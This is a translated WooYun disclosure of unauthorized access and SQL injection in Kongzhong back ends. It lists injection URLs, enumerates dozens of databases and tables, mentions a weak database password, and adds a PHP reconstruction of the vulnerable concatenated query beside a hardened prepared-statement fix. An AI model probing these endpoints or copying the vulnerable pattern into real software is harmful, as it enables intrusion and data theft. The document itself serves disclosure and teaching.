Vulnerability summary

Defect ID: wooyun-2015-0155842

Title: 空中网 (Kongzhong) server-configuration / duty-management back end: unauthorized access \ high-privilege SQL injection (affects multiple databases)

Vendor: 空中网 (Kongzhong)

Author: 路人甲

Submitted: 2015-11-25 16:34

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-11-25: details sent to the vendor, awaiting vendor handling
2015-11-25: vendor has confirmed; details visible to the vendor only
2015-12-05: details disclosed to core white hats and relevant domain experts
2015-12-15: details disclosed to regular white hats
2015-12-25: details disclosed to intern white hats
2016-01-11: details disclosed to the public

Brief description:

Kongzhong | server-configuration / duty-management back end: unauthorized access | high-privilege injection | affects multiple databases

Detailed description:

Back-end page reachable without authorization (broken access control):
http://xxx.kongzhong.com/index3.php
Injection points (the Uid parameter):
http://xxx.kongzhong.com/server.php?action=full&Uid=605
http://sd.kongzhong.com//applicationlist.php?action=full&Uid=10

Proof of vulnerability:

Database: furq
[1 table]
+---------------------------------------+
| FILEDATA |
+---------------------------------------+
Database: quanxian
[14 tables]
+---------------------------------------+
| SEQUENCE |
| t_authority |
| t_enum_type |
| t_enum_value |
| t_menu |
| t_role |
| t_user |
| t_user_authority |
| t_user_channel |
| t_user_daily |
| t_user_menu |
| t_user_operators |
| t_user_product |
| t_user_role |
+---------------------------------------+
Database: aloco
[1 table]
+---------------------------------------+
| pushmsg |
+---------------------------------------+
Database: kzs
[2 tables]
+---------------------------------------+
| kzs_info |
| kzs_reply |
+---------------------------------------+
Database: kongzhong
[53 tables]
+---------------------------------------+
| session |
| user |
| adminlog |
| adminutil |
| announcement |
| attachment |
| avatar |
| bbcode |
| calendar_events |
| customavatar |
| favorites_folders |
| favorites_threads |
| fb_ad |
| fb_sitelink |
| forum |
| forumpermission |
| gallery_photos |
| gallery_sort |
| icon |
| league |
| moderator |
| newsfade |
| poll |
| pollvote |
| post |
| privatemessage |
| profilefield |
| regimage |
| replacement |
| replacementset |
| search |
| searchindex |
| setting |
| settinggroup |
| smilie |
| style |
| subscribeforum |
| subscribethread |
| template |
| templateset |
| thread |
| threadrate |
| useractivation |
| userfield |
| usergroup |
| usertitle |
| vbstats_counter |
| vbstats_countries |
| vbstats_date |
| vbstats_exclude |
| vbstats_options |
| vbstats_referrer |
| word |
+---------------------------------------+
Database: bbscs6
[76 tables]
+---------------------------------------+
| BBSCS_ADV |
| BBSCS_BLACKUSER |
| BBSCS_BOARD |
| BBSCS_BOARDS |
| BBSCS_BOOKMARK_0 |
| BBSCS_BOOKMARK_1 |
| BBSCS_BOOKMARK_2 |
| BBSCS_BOOKMARK_3 |
| BBSCS_BOOKMARK_4 |
| BBSCS_BOOKMARK_5 |
| BBSCS_BOOKMARK_6 |
| BBSCS_BOOKMARK_7 |
| BBSCS_BOOKMARK_8 |
| BBSCS_BOOKMARK_9 |
| BBSCS_BULLETIN |
| BBSCS_COMMEND |
| BBSCS_ELITE |
| BBSCS_FORUM_0 |
| BBSCS_FORUM_1 |
| BBSCS_FORUM_10 |
| BBSCS_FORUM_11 |
| BBSCS_FORUM_12 |
| BBSCS_FORUM_13 |
| BBSCS_FORUM_14 |
| BBSCS_FORUM_15 |
| BBSCS_FORUM_16 |
| BBSCS_FORUM_17 |
| BBSCS_FORUM_18 |
| BBSCS_FORUM_19 |
| BBSCS_FORUM_2 |
| BBSCS_FORUM_3 |
| BBSCS_FORUM_4 |
| BBSCS_FORUM_5 |
| BBSCS_FORUM_6 |
| BBSCS_FORUM_7 |
| BBSCS_FORUM_8 |
| BBSCS_FORUM_9 |
| BBSCS_FRIEND_0 |
| BBSCS_FRIEND_1 |
| BBSCS_FRIEND_2 |
| BBSCS_FRIEND_3 |
| BBSCS_FRIEND_4 |
| BBSCS_FRIEND_5 |
| BBSCS_FRIEND_6 |
| BBSCS_FRIEND_7 |
| BBSCS_FRIEND_8 |
| BBSCS_FRIEND_9 |
| BBSCS_GUESTBOOK_0 |
| BBSCS_GUESTBOOK_1 |
| BBSCS_GUESTBOOK_2 |
| BBSCS_GUESTBOOK_3 |
| BBSCS_GUESTBOOK_4 |
| BBSCS_GUESTBOOK_5 |
| BBSCS_GUESTBOOK_6 |
| BBSCS_GUESTBOOK_7 |
| BBSCS_GUESTBOOK_8 |
| BBSCS_GUESTBOOK_9 |
| BBSCS_ONLINESTAT |
| BBSCS_SUBSCIBE_0 |
| BBSCS_SUBSCIBE_1 |
| BBSCS_SUBSCIBE_2 |
| BBSCS_SUBSCIBE_3 |
| BBSCS_SUBSCIBE_4 |
| BBSCS_SUBSCIBE_5 |
| BBSCS_SUBSCIBE_6 |
| BBSCS_SUBSCIBE_7 |
| BBSCS_SUBSCIBE_8 |
| BBSCS_SUBSCIBE_9 |
| BBSCS_SYSSTAT |
| BBSCS_TABLEID |
| BBSCS_USERDETAIL |
| BBSCS_USERINFO |
| BBSCS_USERONLINE |
| BBSCS_VOTE |
| BBSCS_VOTEITEM |
| BBSCS_VOTEUSER |
+---------------------------------------+
Database: kzwedit
[4 tables]
+---------------------------------------+
| admin |
| config |
| guestbook |
| lockip |
+---------------------------------------+
Database: cms_server
[20 tables]
+---------------------------------------+
| cms_application |
| cms_collect |
| cms_due_pro |
| cms_due_pro_time |
| cms_group |
| cms_info_due |
| cms_job_due |
| cms_server |
| cms_stat_due |
| cms_stock |
| cms_user |
| monitor_data |
| monitor_group |
| monitor_logs |
| monitor_maintenancerecord |
| monitor_rate |
| monitor_role |
| monitor_server_info |
| monitor_user |
| wap_ip_tab |
+---------------------------------------+
Database: bjql
[7 tables]
+---------------------------------------+
| asiad |
| bjql_info |
| bjql_member |
| bjql_picnews |
| bjql_picture |
| olympic_volunteer |
| volunteer |
+---------------------------------------+
Database: vote
[6 tables]
+---------------------------------------+
| poll_config |
| poll_data |
| poll_index |
| poll_ip |
| poll_log |
| poll_user |
+---------------------------------------+
Database: home
[2 tables]
+---------------------------------------+
| demouser |
| feedback |
+---------------------------------------+
Database: xvote
[7 tables]
+---------------------------------------+
| Vote_Admin |
| Vote_Area |
| Vote_Group |
| Vote_Vote |
| Vote_VoteItem |
| Vote_Voter |
| liuyan_temp |
+---------------------------------------+
Database: woaika
[2 tables]
+---------------------------------------+
| cardinfo |
| users |
+---------------------------------------+
Database: GOLDENFROG
[13 tables]
+---------------------------------------+
| T_PS_CLIENT |
| T_PS_CONDITION |
| T_PS_PROMOCONDITION |
| T_PS_PROMOPATH |
| T_PS_SCHEMA |
| T_PS_SERVPATH |
| account |
| department |
| employee |
| employee20100331 |
| employee_bak |
| mdwtest |
| ps_id |
+---------------------------------------+
Database: php_bbs
[25 tables]
+---------------------------------------+
| pw_actions |
| pw_adminset |
| pw_announce |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_config |
| pw_credits |
| pw_favors |
| pw_forums |
| pw_hack |
| pw_membercredit |
| pw_memberinfo |
| pw_members |
| pw_msg |
| pw_polls |
| pw_posts |
| pw_schcache |
| pw_sharelinks |
| pw_smiles |
| pw_styles |
| pw_threads |
| pw_tmsgs |
| pw_usergroups |
| pw_wordfb |
+---------------------------------------+
Database: jive
[17 tables]
+---------------------------------------+
| jiveForum |
| jiveForumProp |
| jiveGroup |
| jiveGroupPerm |
| jiveGroupProp |
| jiveGroupUser |
| jiveID |
| jiveMessage |
| jiveMessageProp |
| jiveModeration |
| jiveReward |
| jiveThread |
| jiveThreadProp |
| jiveUser |
| jiveUserPerm |
| jiveUserProp |
| jiveWatch |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: ymarticlefree
[7 tables]
+---------------------------------------+
| user |
| art_topic |
| article |
| moderator |
| setting |
| smilie |
| usergroup |
+---------------------------------------+
Database: mrbs
[3 tables]
+---------------------------------------+
| mrbs_entry |
| mrbs_repeat |
| mrbs_room |
+---------------------------------------+
Database: core
[99 tables]
+---------------------------------------+
| language |
| session |
| user |
| access |
| adminhelp |
| administrator |
| adminlog |
| adminutil |
| announcement |
| attachment |
| attachmenttype |
| attachmentviews |
| avatar |
| bank_log |
| bbcode |
| calendar |
| calendarcustomfield |
| calendarmoderator |
| calendarpermission |
| cpsession |
| cron |
| cronlog |
| customavatar |
| customprofilepic |
| datastore |
| deletionlog |
| editlog |
| event |
| faq |
| forum |
| forumpermission |
| forumread |
| holiday |
| icon |
| imagecategory |
| imagecategorypermission |
| mailqueue |
| moderation |
| moderator |
| moderatorlog |
| passwordhistory |
| paymentapi |
| paymentinfo |
| paymenttransaction |
| phrase |
| phrasetype |
| plugin |
| pm |
| pmreceipt |
| pmtext |
| poll |
| pollvote |
| post |
| post_parsed |
| posthash |
| postindex |
| product |
| productcode |
| profilefield |
| ranks |
| rating |
| regimage |
| reminder |
| reputation |
| reputationlevel |
| search |
| setting |
| settinggroup |
| sitelink |
| smilie |
| stats |
| strikes |
| style |
| subscribeevent |
| subscribeforum |
| subscribethread |
| subscription |
| subscriptionlog |
| tachyforumpost |
| tachythreadpost |
| template |
| templatehistory |
| thread |
| threadcat |
| threadrate |
| threadread |
| threadviews |
| upgradelog |
| useractivation |
| userban |
| userfield |
| usergroup |
| usergroupleader |
| usergrouprequest |
| usernote |
| userpromotion |
| usertextfield |
| usertitle |
| word |
+---------------------------------------+
Database: diaocha
[1 table]
+---------------------------------------+
| diaocha |
+---------------------------------------+
Database: jforum
[35 tables]
+---------------------------------------+
| jforum_attach |
| jforum_attach_desc |
| jforum_attach_quota |
| jforum_banlist |
| jforum_bookmarks |
| jforum_categories |
| jforum_config |
| jforum_extension_groups |
| jforum_extensions |
| jforum_forums |
| jforum_groups |
| jforum_karma |
| jforum_posts |
| jforum_posts_text |
| jforum_privmsgs |
| jforum_privmsgs_text |
| jforum_quota_limit |
| jforum_ranks |
| jforum_role_values |
| jforum_roles |
| jforum_search_results |
| jforum_search_topics |
| jforum_search_wordmatch |
| jforum_search_words |
| jforum_sessions |
| jforum_smilies |
| jforum_themes |
| jforum_topics |
| jforum_topics_watch |
| jforum_user_groups |
| jforum_users |
| jforum_vote_desc |
| jforum_vote_results |
| jforum_vote_voters |
| jforum_words |
+---------------------------------------+
Database: cardjive
[17 tables]
+---------------------------------------+
| jiveForum |
| jiveForumProp |
| jiveGroup |
| jiveGroupPerm |
| jiveGroupProp |
| jiveGroupUser |
| jiveID |
| jiveMessage |
| jiveMessageProp |
| jiveModeration |
| jiveReward |
| jiveThread |
| jiveThreadProp |
| jiveUser |
| jiveUserPerm |
| jiveUserProp |
| jiveWatch |
+---------------------------------------+
Database: bbs2
[46 tables]
+---------------------------------------+
| session |
| user |
| adminlog |
| adminutil |
| announcement |
| attachment |
| avatar |
| bbcode |
| calendar_events |
| customavatar |
| forum |
| forumpermission |
| icon |
| league |
| moderator |
| newsfade |
| poll |
| pollvote |
| post |
| privatemessage |
| profilefield |
| replacement |
| replacementset |
| search |
| searchindex |
| setting |
| settinggroup |
| smilie |
| style |
| subscribeforum |
| subscribethread |
| template |
| templateset |
| thread |
| threadrate |
| useractivation |
| userfield |
| usergroup |
| usertitle |
| vbstats_counter |
| vbstats_countries |
| vbstats_date |
| vbstats_exclude |
| vbstats_options |
| vbstats_referrer |
| word |
+---------------------------------------+
Database: phpwind
[25 tables]
+---------------------------------------+
| pw_actions |
| pw_adminset |
| pw_announce |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_config |
| pw_credits |
| pw_favors |
| pw_forums |
| pw_hack |
| pw_membercredit |
| pw_memberinfo |
| pw_members |
| pw_msg |
| pw_polls |
| pw_posts |
| pw_schcache |
| pw_sharelinks |
| pw_smiles |
| pw_styles |
| pw_threads |
| pw_tmsgs |
| pw_usergroups |
| pw_wordfb |
+---------------------------------------+
Database: spoa
[6 tables]
+---------------------------------------+
| spoakf_address_config |
| spoakf_info |
| spoakf_info_detail |
| spoakf_info_detail_tmp |
| spoakf_info_tmp |
| spoakf_term |
+---------------------------------------+
Database: info
[1 table]
+---------------------------------------+
| infomation |
+---------------------------------------+
Database: training
[15 tables]
+---------------------------------------+
| account |
| employee2 |
| t_clubchange |
| t_clubmember |
| t_curriculum_informtime |
| t_train_attendence |
| t_train_club |
| t_train_curriculum |
| t_train_evaluation |
| t_train_feedback |
| t_train_poll |
| t_train_pollcount |
| t_train_pollitem |
| t_train_quota |
| t_train_signup |
+---------------------------------------+
Database: forum
[48 tables]
+---------------------------------------+
| session |
| user |
| adminlog |
| adminutil |
| announcement |
| attachment |
| avatar |
| bbcode |
| calendar_events |
| customavatar |
| forum |
| forumpermission |
| gallery_photos |
| gallery_sort |
| icon |
| league |
| moderator |
| newsfade |
| poll |
| pollvote |
| post |
| privatemessage |
| profilefield |
| replacement |
| replacementset |
| search |
| searchindex |
| setting |
| settinggroup |
| smilie |
| style |
| subscribeforum |
| subscribethread |
| template |
| templateset |
| thread |
| threadrate |
| useractivation |
| userfield |
| usergroup |
| usertitle |
| vbstats_counter |
| vbstats_countries |
| vbstats_date |
| vbstats_exclude |
| vbstats_options |
| vbstats_referrer |
| word |
+---------------------------------------+
Database: mysql
[125 tables]
+---------------------------------------+
| user |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_buddys |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mythreads |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms |
| cdb_pmsearchindex |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_words |
| columns_priv |
| db |
| event |
| func |
| general_log |
| ghost |
| ghost1 |
| ghostsys |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| sgl |
| slow_log |
| tables_priv |
| tempEx |
| tempExT |
| tempExT1 |
| tempMix |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| udp |
+---------------------------------------+
Database: bjqlbbs
[25 tables]
+---------------------------------------+
| pw_actions |
| pw_adminset |
| pw_announce |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_config |
| pw_credits |
| pw_favors |
| pw_forums |
| pw_hack |
| pw_membercredit |
| pw_memberinfo |
| pw_members |
| pw_msg |
| pw_polls |
| pw_posts |
| pw_schcache |
| pw_sharelinks |
| pw_smiles |
| pw_styles |
| pw_threads |
| pw_tmsgs |
| pw_usergroups |
| pw_wordfb |
+---------------------------------------+
Database: pxxt
[22 tables]
+---------------------------------------+
| EMPLOYEE15 |
| EMPLOYEE17 |
| EMPLOYEE2 |
| EMPLOYEE6 |
| EMPLOYEE7 |
| employee10 |
| employee11 |
| employee12 |
| employee13 |
| employee14 |
| employee16 |
| employee3 |
| employee4 |
| employee5 |
| employee8 |
| employee9 |
| t_train_attendence |
| t_train_curriculum |
| t_train_poll |
| t_train_pollcount |
| t_train_pollitem |
| t_train_signup |
+---------------------------------------+
Database: jspcndb
[8 tables]
+---------------------------------------+
| wh_board |
| wh_keyword |
| wh_logrecord |
| wh_news |
| wh_newsdetail |
| wh_review |
| wh_type |
| wh_user |
+---------------------------------------+
Database: booksdb
[2 tables]
+---------------------------------------+
| book_info |
| book_jy_info |
+---------------------------------------+
Database: ql
[10 tables]
+---------------------------------------+
| ql_10member |
| ql_federation_picture |
| ql_id |
| ql_info |
| ql_meeting |
| ql_member |
| ql_message |
| ql_message_test |
| ql_picture |
| ql_replymo |
+---------------------------------------+

Fix recommendation:

Employee-only back ends like http://xxx.kongzhong.com should not be reachable from the public internet!
The database password 123456 was visible too, very sharp!
WooYun has plenty of PHP experts; your company only needs to put out a call and the injection problems will be fixed in minutes!
One last question: I play World of Tanks on your servers and clumsily killed a teammate; could you help get me unbanned?

Copyright notice: credit the source when reposting: 路人甲@乌云
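Added example, not the report's or Kongzhong's code: a reconstruction of the pattern this report describes, a PHP back-end page that splices the Uid query parameter straight into SQL and never checks who is calling, next to a hardened form that enforces the role check, validates Uid as an integer and binds it in a prepared statement. The table name cms_server comes from the listing above; the Uid column, the session fields, the role name duty_admin, the account duty_ro and the DSN are assumptions.

```php
<?php
// Assumptions (not from the report): MySQL via PDO, $_SESSION['user_id'] and
// $_SESSION['role'] set at login, a cms_server table with a Uid column.

// --- Vulnerable pattern (illustrative, not the original server.php) ---
function full_server_info_vulnerable(PDO $db): array
{
    $uid = $_GET['Uid'];                                   // attacker-controlled string
    $sql = "SELECT * FROM cms_server WHERE Uid = " . $uid; // spliced verbatim into SQL
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);   // no caller check anywhere
}

// --- Hardened form ---
function require_duty_admin(): void
{
    // Authorisation first: the report's "cross-privilege access" is this check missing.
    if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== 'duty_admin') {
        http_response_code(403);
        exit('forbidden');
    }
}

function full_server_info(PDO $db): array
{
    require_duty_admin();
    // Validate the type before the value gets near SQL: Uid must be a positive integer.
    $uid = filter_input(INPUT_GET, 'Uid', FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    if ($uid === false || $uid === null) {
        http_response_code(400);
        exit('bad Uid');
    }
    // Parameterised query: the value is bound, never concatenated into the statement.
    $stmt = $db->prepare('SELECT * FROM cms_server WHERE Uid = :uid');
    $stmt->execute([':uid' => $uid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connect with a dedicated least-privilege account that can only read the
// duty-management schema, not a login that can enumerate mysql.user as the
// proof above shows. Hypothetical DSN and account; credentials come from the
// environment rather than the source tree.
$db = new PDO('mysql:host=127.0.0.1;dbname=cms_server;charset=utf8mb4',
              'duty_ro', getenv('DUTY_DB_PASSWORD'),
              [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
               PDO::ATTR_EMULATE_PREPARES => false]);

header('Content-Type: application/json');
echo json_encode(full_server_info($db));
```

With real prepared statements (emulation disabled) the Uid value is sent separately from the query text, so the injection shown in the listing above is not possible through this parameter; the role check closes the unauthenticated path to the page itself.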


Vulnerability response

Vendor response:

Severity: Medium

Rank: 5

Confirmed: 2015-11-25 17:11

Vendor reply:

Thanks for the attention. You can tell us your tank account and we will help coordinate.

Latest status:

None yet


Comments:

  1. 2015-11-26 10:46 | railguninhere ( Passer-by | Rank:4 Vulnerabilities:2 | Railgun total failure!)

    Damn, this is slick! I want a 屎59!